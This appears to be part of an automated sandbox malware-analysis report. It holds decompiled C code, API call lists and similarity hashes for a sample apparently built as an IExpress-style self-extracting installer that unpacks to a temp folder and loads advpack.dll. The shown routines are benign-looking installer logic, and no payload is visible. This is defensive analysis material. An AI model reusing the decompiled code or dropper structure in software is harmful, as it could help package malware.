												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E010D28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x10d9a40 = _t119;
						 *0x10d8184 = 1;
						 *0x10d8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x10d9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x10d8184 = _t135;
							 *0x10d8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E010D44B9(0, _t138);
					L66:
					return E010D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x010d36f9
0x010d3700
0x010d370c
0x010d3716
0x010d3718
0x010d371b
0x010d3721
0x010d372b
0x010d373d
0x010d3745
0x010d3746
0x010d3746
0x010d3749
0x010d37ab
0x010d37ad
0x010d37ae
0x010d37b3
0x010d37b8
0x010d37b8
0x010d37bf
0x010d37bf
0x010d37c5
0x00000000
0x00000000
0x010d37cb
0x010d37cd
0x00000000
0x00000000
0x010d37d5
0x010d37db
0x010d37e8
0x010d37ea
0x010d37ea
0x010d37ea
0x010d37f0
0x010d37f6
0x010d3805
0x010d3817
0x010d382b
0x010d3830
0x010d3836
0x010d383b
0x010d383d
0x010d38eb
0x010d38eb
0x010d38f2
0x010d390c
0x010d3911
0x010d3911
0x010d3913
0x010d394d
0x010d394d
0x010d394f
0x010d38a9
0x010d38a9
0x010d38b0
0x010d38b2
0x010d38b9
0x010d38bb
0x010d38c1
0x010d3975
0x010d38c7
0x010d38de
0x010d38e0
0x010d38e0
0x010d397b
0x010d397d
0x010d39a9
0x010d397f
0x010d3982
0x010d398b
0x010d398d
0x010d398f
0x010d399f
0x010d39a1
0x010d3991
0x010d3991
0x010d3991
0x010d398f
0x010d39af
0x010d39b6
0x010d3a0f
0x010d3a0f
0x010d3a11
0x010d3a13
0x010d3a19
0x00000000
0x010d39b8
0x010d39b8
0x010d39ba
0x00000000
0x00000000
0x010d39bc
0x010d39bf
0x00000000
0x00000000
0x010d39c3
0x010d39c9
0x010d39ce
0x010d39d0
0x010d39e3
0x010d39e5
0x010d39e6
0x010d39f1
0x010d39f7
0x010d39fa
0x010d3a01
0x010d3a04
0x00000000
0x00000000
0x010d3a06
0x010d3a09
0x010d3a09
0x010d3a0b
0x010d3a0b
0x00000000
0x010d3a09
0x010d39fc
0x00000000
0x010d39fc
0x010d39d3
0x010d39d8
0x010d39da
0x00000000
0x00000000
0x00000000
0x010d39dc
0x010d39b6
0x010d3955
0x010d395b
0x00000000
0x00000000
0x010d3961
0x010d3963
0x00000000
0x00000000
0x010d3969
0x010d3969
0x00000000
0x010d3969
0x010d3915
0x010d3915
0x010d391b
0x010d391f
0x00000000
0x00000000
0x010d392d
0x010d3933
0x010d3938
0x010d393a
0x00000000
0x00000000
0x010d3940
0x010d3946
0x010d394b
0x00000000
0x010d394b
0x00000000
0x010d38f2
0x010d3843
0x010d3845
0x00000000
0x00000000
0x010d384b
0x010d384d
0x010d3883
0x010d3885
0x00000000
0x00000000
0x010d389a
0x010d389e
0x010d389e
0x00000000
0x00000000
0x010d38a0
0x010d38a0
0x010d38a2
0x00000000
0x00000000
0x010d38a4
0x00000000
0x010d38a4
0x010d384f
0x010d3851
0x010d3857
0x010d386e
0x010d3877
0x010d387b
0x00000000
0x00000000
0x00000000
0x010d3881
0x010d3859
0x010d385c
0x010d3862
0x010d3866
0x00000000
0x00000000
0x010d3868
0x00000000
0x010d38f4
0x010d38f4
0x010d38f5
0x010d38fb
0x010d3901
0x010d3901
0x00000000
0x010d390a
0x010d374b
0x010d374e
0x010d375c
0x010d3764
0x010d3769
0x010d376e
0x010d3771
0x010d379c
0x010d379f
0x00000000
0x00000000
0x010d37a3
0x010d37a4
0x00000000
0x010d37a4
0x010d3773
0x010d3777
0x010d3778
0x010d377f
0x010d3781
0x010d378e
0x010d378e
0x010d3794
0x00000000
0x010d3794
0x010d3783
0x00000000
0x00000000
0x010d3785
0x010d378c
0x00000000
0x00000000
0x00000000
0x010d378c
0x010d3750
0x00000000
0x010d372d
0x010d372d
0x010d396b
0x010d396b
0x010d396c
0x010d396e
0x010d396f
0x010d3a1e
0x010d3a1e
0x010d3a22
0x010d3a27
0x010d3a3e
0x010d3a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010D3723
MessageBeep.USER32(00000000), ref: 010D39C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 010D39F1

Strings

3, xrefs: 010D3785
doza2, xrefs: 010D39E9, 010D3A19

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: 7d61bda374b3403e834b3013feffa4585897a21bd7994b01a128361debe79526
Instruction ID: 201fcc2067f0f0b0008407c052e0a1f22606b8824576f90aa77cc903a65bc6cc
Opcode Fuzzy Hash: 7d61bda374b3403e834b3013feffa4585897a21bd7994b01a128361debe79526
Instruction Fuzzy Hash: 1491C3F1F013259BEBB58A29CC81BEABBB4BB45304F0540E9D9C99F245D7758980CB43

Uniqueness

Uniqueness Score: -1.00%

Function 010D6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E010D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x10d8004; // 0x261cebeb
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E010D1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				_t26 = "advpack.dll";
				E010D658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E010D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x010d6495
0x010d6495
0x010d64a0
0x010d64a7
0x010d64ab
0x010d64bd
0x010d64c2
0x010d64d3
0x010d64df
0x010d64e8
0x010d6502
0x010d64ee
0x010d64f9
0x010d64f9
0x010d6516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010D64DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010D64F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010D6502

Strings

advpack.dll, xrefs: 010D64C2, 010D64CD, 010D6501
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D64AC

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
API String ID: 438848745-3856989675
Opcode ID: c4649b320a419ba98790fa62fef9a04615e8f989990a3827c2ee8c5a1c7832fb
Instruction ID: 28ab82dc806ac34faac557ecc6fa81518b29b47e19443936c38a7d51f079da8e
Opcode Fuzzy Hash: c4649b320a419ba98790fa62fef9a04615e8f989990a3827c2ee8c5a1c7832fb
Instruction Fuzzy Hash: 3F01D170A00208ABDB60DB64DC48EEE7778EB60310F800199F9C5931C8DF76AAC68B50

Uniqueness

Uniqueness Score: -1.00%

Function 010D28E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E010D2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010D2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x010d28f1
0x010d28f4
0x010d28f7
0x010d28f9
0x010d28fc
0x010d28ff
0x010d2901
0x010d2907
0x010d2a62
0x010d2a64
0x010d290d
0x010d290d
0x010d290f
0x010d2912
0x010d2920
0x010d2937
0x00000000
0x00000000
0x010d2944
0x010d294a
0x010d294f
0x010d2a2f
0x010d2a32
0x010d2a34
0x010d2a37
0x010d2a41
0x00000000
0x00000000
0x010d2955
0x010d295e
0x010d2962
0x010d2969
0x010d296f
0x010d2974
0x010d298c
0x010d2a20
0x010d2a21
0x010d2a27
0x010d2a4c
0x010d2a4f
0x010d2a50
0x010d2a53
0x010d2a56
0x010d2a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x010d29b2
0x010d29b2
0x010d29b5
0x010d29bd
0x010d29c3
0x010d29cc
0x010d29d5
0x010d29d7
0x010d29da
0x010d29dd
0x010d29df
0x010d29ec
0x010d29f8
0x010d29fc
0x010d29ff
0x010d2a02
0x010d2a07
0x010d2a0a
0x010d2a0f
0x010d2a19
0x010d2a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x010d2a0f
0x010d298c
0x010d2974
0x010d2962
0x00000000
0x010d294f
0x010d2912
0x010d2a65
0x010d2a68
0x010d2a6c
0x010d2a6f
0x010d2a6f
0x010d2a7d

APIs

GlobalFree.KERNEL32 ref: 010D2A6F

Part of subcall function 010D2773: CharUpperA.USER32(261CEBEB,00000000,00000000,00000000), ref: 010D27A8
Part of subcall function 010D2773: CharNextA.USER32(0000054D), ref: 010D27B5
Part of subcall function 010D2773: CharNextA.USER32(00000000), ref: 010D27BC
Part of subcall function 010D2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2829
Part of subcall function 010D2773: RegQueryValueExA.ADVAPI32(?,010D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2852
Part of subcall function 010D2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D2870
Part of subcall function 010D2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010D28A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010D3938,?,?,?,?,-00000005), ref: 010D2958
GlobalLock.KERNEL32 ref: 010D2969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010D3938,?,?,?,?,-00000005,?), ref: 010D2A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010D2A81

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: 825103011987a8619dec091d1561dd23bd3f8550c42c478a3723d93ef8c3633a
Instruction ID: acbed8dadf80460c5825b17ac886ccf070cc8a617c83b540e95374752c01ba9a
Opcode Fuzzy Hash: 825103011987a8619dec091d1561dd23bd3f8550c42c478a3723d93ef8c3633a
Instruction Fuzzy Hash: 15512A31E00219DFDB21DF9CC884AAEFBB5FF48701F14816AE985E3211DB359941CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 010D4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E010D4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E010D468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E010D468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E010D44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x010d417d
0x010d418f
0x010d4193
0x010d41b7
0x010d41d3
0x010d41e6
0x00000000
0x010d41e7
0x010d41d5
0x010d41d6
0x010d41d8
0x010d41d9
0x010d41da
0x010d41df
0x010d41e1
0x00000000
0x010d41e1
0x010d41b9
0x010d41ba
0x010d41bc
0x010d41bd
0x010d41be
0x00000000
0x010d41be
0x00000000

APIs

Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010D30B4), ref: 010D4189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010D30B4), ref: 010D41E7

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Strings

<None>, xrefs: 010D41C5
FINISHMSG, xrefs: 010D4173, 010D41AB

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 30e99ee1df7182d1bff3a69ee56f7802e6334c3c87a597f053dce26fe9eab285
Instruction ID: e6133ef353932fbbf77feaba1598881907ad9f0502a061f724bf21aec2f4ad7e
Opcode Fuzzy Hash: 30e99ee1df7182d1bff3a69ee56f7802e6334c3c87a597f053dce26fe9eab285
Instruction Fuzzy Hash: 9F01F4B9701315BBF3251A798C85FBB658EDBD86D5F004025BBC6E29C4DE79CC0141B5

Uniqueness

Uniqueness Score: -1.00%

Function 010D7155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D7155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x10d8004; // 0x261cebeb
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x10d8004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x10d8004 = _t39;
				}
				_t37 =  !_t36;
				 *0x10d8008 = _t37;
				return _t37;
			}

0x010d715d
0x010d7161
0x010d7165
0x010d7178
0x010d7182
0x010d718e
0x010d7197
0x010d71a0
0x010d71b1
0x010d71b8
0x010d71c4
0x010d71c7
0x010d71cb
0x010d71d5
0x010d71da
0x010d71da
0x010d71dc
0x010d71dc
0x010d71e2
0x010d71e5
0x010d71ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010D7182
GetCurrentProcessId.KERNEL32 ref: 010D7191
GetCurrentThreadId.KERNEL32 ref: 010D719A
GetTickCount.KERNEL32 ref: 010D71A3
QueryPerformanceCounter.KERNEL32(?), ref: 010D71B8

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 8afb7afa08838a6561db57db3b765f4a405d62896f1d180afe4eeb068bdd2769
Instruction ID: 7a93c94579ca5d3ff7e55c055cb907c38faf7eb16655a9d5f2a41a49159afed6
Opcode Fuzzy Hash: 8afb7afa08838a6561db57db3b765f4a405d62896f1d180afe4eeb068bdd2769
Instruction Fuzzy Hash: EC112E75E02208DFCB60DFB8D648A9EBBF5FF48355F654996E845E7204E7399A008B40

Uniqueness

Uniqueness Score: -1.00%

Function 010D19E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E010D19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0x10d8004; // 0x261cebeb
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E010D43D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0x10d9a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E010D6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010d19e0
0x010d19e0
0x010d19eb
0x010d19f2
0x010d19f9
0x010d19fc
0x010d1a01
0x010d1a2a
0x010d1a2e
0x010d1a3e
0x010d1a4f
0x010d1a62
0x010d1a6a
0x00000000
0x010d1a03
0x010d1a06
0x010d1a20
0x010d1a20
0x010d1a08
0x010d1a08
0x010d1a14
0x00000000
0x010d1a16
0x010d1a18
0x010d1a70
0x010d1a72
0x010d1a72
0x010d1a14
0x010d1a06
0x010d1a81

APIs

EndDialog.USER32(?,?), ref: 010D1A18
GetDesktopWindow.USER32 ref: 010D1A24
LoadStringA.USER32(?,?,00000200), ref: 010D1A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010D1A62
MessageBeep.USER32(000000FF), ref: 010D1A6A

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: d7fa130e327a9071497ff925ecb89134af7aa0d6b0df26bfd28b568b04eb8fe7
Instruction ID: ebaf1d70772a39f89c8d54c1f984b33c8d43b2655ecd1da68270f319b5850cab
Opcode Fuzzy Hash: d7fa130e327a9071497ff925ecb89134af7aa0d6b0df26bfd28b568b04eb8fe7
Instruction Fuzzy Hash: 02118E3160121AABDB20EF78D908AAE77F8EB49250F008195F99293185DE359E01CB96

Uniqueness

Uniqueness Score: -1.00%

Function 010D63C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E010D63C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x10d8004; // 0x261cebeb
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E010D1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				E010D658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
